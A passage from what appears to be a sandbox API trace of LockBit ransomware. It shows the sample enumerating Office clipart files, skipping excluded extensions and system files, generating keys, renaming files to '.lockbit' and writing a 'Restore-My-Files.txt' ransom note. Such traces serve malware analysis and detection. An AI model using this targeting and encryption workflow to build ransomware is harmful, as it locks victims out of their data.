[0142.122] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.122] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.122] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF.lockbit") returned 72 [0142.122] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107712.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0142.123] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.123] malloc (_Size=0x40068) returned 0x3df0008 [0142.123] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4636) returned 1 [0142.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.123] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0142.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.124] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.124] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0142.124] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0142.140] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.140] malloc (_Size=0xa6) returned 0x77d7a8 [0142.140] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.141] free (_Block=0x77d7a8) [0142.141] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107712.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.141] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.141] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.141] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65edb1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xed8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107718.WMF", cAlternateFileName="")) returned 1 [0142.141] lstrcmpiW (lpString1=".", lpString2="J0107718.WMF") returned -1 [0142.141] lstrcmpiW (lpString1="..", lpString2="J0107718.WMF") returned -1 [0142.141] PathFindExtensionW (pszPath="J0107718.WMF") returned=".WMF" [0142.141] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.141] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.141] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.141] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.141] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.141] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.141] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.141] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.141] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.141] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.141] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.141] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.141] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.141] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.142] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.142] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107718.WMF") returned 1 [0142.143] lstrcmpiW (lpString1="ntldr", lpString2="J0107718.WMF") returned 1 [0142.143] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107718.WMF") returned 1 [0142.143] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107718.WMF") returned -1 [0142.143] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107718.WMF") returned -1 [0142.143] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107718.WMF") returned 1 [0142.143] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107718.WMF") returned -1 [0142.143] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.143] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF") returned=".WMF" [0142.143] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.143] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.143] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.144] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.144] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF.lockbit") returned 72 [0142.144] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107718.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0142.145] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.145] malloc (_Size=0x40068) returned 0x3d70450 [0142.145] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3800) returned 1 [0142.145] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0142.146] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0142.146] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0142.150] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.150] malloc (_Size=0xa6) returned 0x77d7a8 [0142.150] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.151] free (_Block=0x77d7a8) [0142.151] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107718.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.151] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.151] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.152] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65edb1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2044, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107722.WMF", cAlternateFileName="")) returned 1 [0142.155] lstrcmpiW (lpString1=".", lpString2="J0107722.WMF") returned -1 [0142.155] lstrcmpiW (lpString1="..", lpString2="J0107722.WMF") returned -1 [0142.155] PathFindExtensionW (pszPath="J0107722.WMF") returned=".WMF" [0142.155] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.155] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.155] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.155] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.155] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.155] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.155] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.155] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.155] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.155] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.155] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.155] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.155] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.155] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.156] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.156] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107722.WMF") returned 1 [0142.157] lstrcmpiW (lpString1="ntldr", lpString2="J0107722.WMF") returned 1 [0142.157] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107722.WMF") returned 1 [0142.157] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107722.WMF") returned -1 [0142.157] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107722.WMF") returned -1 [0142.157] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107722.WMF") returned 1 [0142.157] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107722.WMF") returned -1 [0142.157] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.157] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF") returned=".WMF" [0142.157] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.157] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.157] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.158] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.158] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.158] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.158] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.158] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.158] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.158] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.158] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.158] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.158] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.158] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.158] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.158] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF.lockbit") returned 72 [0142.158] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107722.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0142.159] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.159] malloc (_Size=0x40068) returned 0x3e70008 [0142.159] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=8260) returned 1 [0142.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.159] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.159] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0142.159] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.160] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.160] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0142.160] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0142.162] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.162] malloc (_Size=0xa6) returned 0x77d7a8 [0142.162] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.162] free (_Block=0x77d7a8) [0142.163] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107722.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.163] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.163] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.163] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563ba0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1b68, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107724.WMF", cAlternateFileName="")) returned 1 [0142.163] lstrcmpiW (lpString1=".", lpString2="J0107724.WMF") returned -1 [0142.163] lstrcmpiW (lpString1="..", lpString2="J0107724.WMF") returned -1 [0142.163] PathFindExtensionW (pszPath="J0107724.WMF") returned=".WMF" [0142.163] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.163] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.164] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.164] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 